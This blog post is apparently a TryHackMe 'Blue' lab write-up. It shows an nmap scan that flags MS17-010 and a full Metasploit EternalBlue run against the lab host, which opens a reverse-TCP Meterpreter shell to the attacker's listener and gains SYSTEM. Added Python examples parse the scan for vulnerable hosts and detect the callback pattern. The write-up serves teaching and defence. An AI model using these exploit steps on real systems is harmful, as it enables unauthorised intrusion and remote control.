Lluna's Pure land.


tryhackme-[blue]

0x01.Demo

0x02. Information gathering

The vuln scripts flag MS17-010 (EternalBlue).

root@JIYE:~/tryhackme/blue# nmap -sC -vv --script=vuln 10.10.246.255 -oN nmap.demo
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-15 05:38 EST
NSE: Loaded 105 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 05:38
Completed NSE at 05:38, 10.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 05:38
Completed NSE at 05:38, 0.00s elapsed
Initiating Ping Scan at 05:38
Scanning 10.10.246.255 [4 ports]
Completed Ping Scan at 05:38, 0.30s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:38
Completed Parallel DNS resolution of 1 host. at 05:38, 0.02s elapsed
Initiating SYN Stealth Scan at 05:38
Scanning 10.10.246.255 [1000 ports]
Discovered open port 445/tcp on 10.10.246.255
Discovered open port 3389/tcp on 10.10.246.255
Discovered open port 139/tcp on 10.10.246.255
Discovered open port 135/tcp on 10.10.246.255
Discovered open port 49154/tcp on 10.10.246.255
Discovered open port 49159/tcp on 10.10.246.255
Discovered open port 49153/tcp on 10.10.246.255
Discovered open port 49158/tcp on 10.10.246.255
Discovered open port 49152/tcp on 10.10.246.255
Completed SYN Stealth Scan at 05:39, 46.22s elapsed (1000 total ports)
NSE: Script scanning 10.10.246.255.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 05:39
NSE: [ssl-ccs-injection 10.10.246.255:3389] No response from server: ERROR
NSE Timing: About 88.47% done; ETC: 05:39 (0:00:04 remaining)
NSE Timing: About 89.08% done; ETC: 05:40 (0:00:07 remaining)
Completed NSE at 05:40, 90.23s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 05:40
Completed NSE at 05:40, 0.00s elapsed
Nmap scan report for 10.10.246.255
Host is up, received echo-reply ttl 127 (0.25s latency).
Scanned at 2021-01-15 05:38:32 EST for 136s
Not shown: 991 closed ports
Reason: 991 resets
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
49152/tcp open unknown syn-ack ttl 127
49153/tcp open unknown syn-ack ttl 127
49154/tcp open unknown syn-ack ttl 127
49158/tcp open unknown syn-ack ttl 127
49159/tcp open unknown syn-ack ttl 127

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 05:40
Completed NSE at 05:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 05:40
Completed NSE at 05:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 147.23 seconds
Raw packets sent: 1189 (52.292KB) | Rcvd: 1066 (42.672KB)
root@JIYE:~/tryhackme/blue#
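As an added example (it is not part of the original write-up), here is a small Python parser for the Nmap normal-format output saved with `-oN` above. It records the open ports and every NSE result, and returns the results whose state is VULNERABLE together with their CVE ids, so a scan of a whole subnet can be turned into a patch list instead of being read by eye. The sample input is a trimmed copy of the scan output above; the class and function names are my own, not Nmap's.

```python
"""Parse Nmap normal (-oN) output and list NSE results in state VULNERABLE."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class Finding:
    script: str
    port: Optional[int]                  # None for host-script results
    state: str = "UNKNOWN"
    risk: str = ""
    cves: List[str] = field(default_factory=list)
    refs: List[str] = field(default_factory=list)


@dataclass
class HostReport:
    host: str
    open_ports: List[Tuple[int, str]] = field(default_factory=list)
    findings: List[Finding] = field(default_factory=list)


REPORT_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+(\S+)")
NAME_RE = re.compile(r"^([A-Za-z][\w-]*):\s*(.*)$")   # "script-name: optional one-line result"
CVE_RE = re.compile(r"CVE-\d{4}-\d+")


def parse_nmap_normal(text: str) -> List[HostReport]:
    hosts: List[HostReport] = []
    host: Optional[HostReport] = None
    port: Optional[int] = None
    finding: Optional[Finding] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = REPORT_RE.match(line)
        if m:
            host = HostReport(m.group(1))
            hosts.append(host)
            port = finding = None
            continue
        if host is None:
            continue
        if not line.startswith("|"):
            finding = None                   # any non-script line ends a script block
            m = PORT_RE.match(line)
            if m:
                port = int(m.group(1))
                host.open_ports.append((port, m.group(2)))
            elif line.startswith("Host script results"):
                port = None                  # what follows belongs to the host, not a port
            continue
        closing = line.startswith("|_")      # "|_" marks the last line of a script result
        body = line[2:].strip() if closing else line[1:].strip()
        if finding is None:
            m = NAME_RE.match(body)
            if m:
                finding = Finding(m.group(1), port)
                host.findings.append(finding)
                if m.group(2):               # one-line result, e.g. "smb-vuln-ms10-054: false"
                    finding.state = m.group(2)
        else:
            key, _, value = body.partition(":")
            key, value = key.strip(), value.strip()
            if key == "State":
                finding.state = value
            elif key == "Risk factor":
                finding.risk = value
            elif key == "IDs":
                finding.cves.extend(CVE_RE.findall(value))
            elif body.startswith("http"):
                finding.refs.append(body)
        if closing:
            finding = None
    return hosts


def vulnerable(hosts: List[HostReport]) -> List[Tuple[str, str, Tuple[str, ...]]]:
    """(host, script, cves) for every result whose state is VULNERABLE or LIKELY VULNERABLE."""
    return [(h.host, f.script, tuple(f.cves)) for h in hosts for f in h.findings
            if f.state.upper().startswith(("VULNERABLE", "LIKELY VULNERABLE"))]


# Trimmed copy of the scan output above, used as sample input.
SAMPLE = """Nmap scan report for 10.10.246.255
Host is up, received echo-reply ttl 127 (0.25s latency).
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
|
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
"""

if __name__ == "__main__":
    for host, script, cves in vulnerable(parse_nmap_normal(SAMPLE)):
        print(f"{host}: {script} {' '.join(cves)}")
```

Feed it the file written by `-oN` and every host that comes back from `vulnerable()` is one that still needs the MS17-010 update (or SMBv1 disabled); the access-denied and `false` results are kept too, so a host that could not be checked is not silently treated as clean.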

0x03. Direct exploitation with MSF

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.246.255
rhosts => 10.10.246.255
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.9.248.83
lhost => 10.9.248.83
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.246.255 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.9.248.83 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.9.248.83:4444
[*] 10.10.246.255:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.246.255:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.246.255:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.246.255:445 - Connecting to target for exploitation.
[+] 10.10.246.255:445 - Connection established for exploitation.
[+] 10.10.246.255:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.246.255:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.246.255:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.246.255:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.246.255:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.246.255:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.246.255:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.246.255:445 - Sending all but last fragment of exploit packet
[*] 10.10.246.255:445 - Starting non-paged pool grooming
[+] 10.10.246.255:445 - Sending SMBv2 buffers
[+] 10.10.246.255:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.246.255:445 - Sending final SMBv2 buffers.
[*] 10.10.246.255:445 - Sending last fragment of exploit packet!
[*] 10.10.246.255:445 - Receiving response from exploit packet
[+] 10.10.246.255:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.246.255:445 - Sending egg to corrupted connection.
[*] 10.10.246.255:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.246.255
[*] Meterpreter session 1 opened (10.9.248.83:4444 -> 10.10.246.255:49201) at 2021-01-15 05:54:08 -0500
[+] 10.10.246.255:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.246.255:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.246.255:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
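From the defender's side, the Metasploit output above leaves a simple network footprint: inbound SMB (445) to the server, then within seconds a brand-new outbound connection from that same server back to the SMB client on an odd port (49201 -> 4444, the reverse TCP handler). The following Python is an added example, not from the write-up, that correlates connection records to flag exactly that pattern. The flow log format, the allow-list of expected outbound ports and the five-minute window are all assumptions made for the example; the records are constructed, using the addresses from the session above.

```python
"""Flag hosts that accept an SMB connection and then call back to the SMB client."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed flow records: (timestamp, src_ip, src_port, dst_ip, dst_port)
FLOWS = [
    ("2021-01-15 05:53:40", "10.9.248.83", 51234, "10.10.246.255", 445),
    ("2021-01-15 05:53:41", "10.9.248.83", 51235, "10.10.246.255", 445),
    ("2021-01-15 05:54:08", "10.10.246.255", 49201, "10.9.248.83", 4444),  # callback
    ("2021-01-15 05:55:00", "10.10.246.255", 49300, "10.10.0.2", 53),      # benign DNS
    ("2021-01-15 06:10:00", "10.9.248.83", 51300, "10.10.246.255", 445),   # SMB, no callback
]

SMB_PORTS = {139, 445}
EXPECTED_OUTBOUND = {53, 80, 123, 443}        # assumed allow-list for a file server's outbound traffic
WINDOW = timedelta(minutes=5)                 # assumed: how soon after SMB a callback counts


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def find_reverse_connections(flows: List[Tuple], window: timedelta = WINDOW) -> List[Dict]:
    """Return one alert per outbound flow from an SMB server back to a recent SMB client."""
    recent_smb = defaultdict(list)            # server_ip -> [(ts, client_ip), ...]
    alerts = []
    for ts_s, src, _sport, dst, dport in sorted(flows, key=lambda f: f[0]):
        ts = parse_ts(ts_s)
        if dport in SMB_PORTS:
            recent_smb[dst].append((ts, src))  # remember who talked SMB to this server
            continue
        if dport in EXPECTED_OUTBOUND:
            continue                          # normal outbound traffic, not of interest
        for smb_ts, client in recent_smb.get(src, []):
            if client == dst and timedelta(0) <= ts - smb_ts <= window:
                alerts.append({
                    "server": src,
                    "client": dst,
                    "callback_port": dport,
                    "smb_at": smb_ts.isoformat(),
                    "callback_at": ts.isoformat(),
                    "delay_s": (ts - smb_ts).total_seconds(),
                })
                break                         # one alert per callback flow is enough
    return alerts


if __name__ == "__main__":
    for alert in find_reverse_connections(FLOWS):
        print(alert)
```

The rule is deliberately narrow: a server that only receives SMB, or that talks to DNS and web as usual, never trips it, but the server-to-client callback on a port the server has no business using does. Pair it with the Windows updates for MS17-010 and with SMBv1 disabled, since detection after the `Meterpreter session 1 opened` line is already late.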
-------------Short on paper, long on feeling; see you next time-------------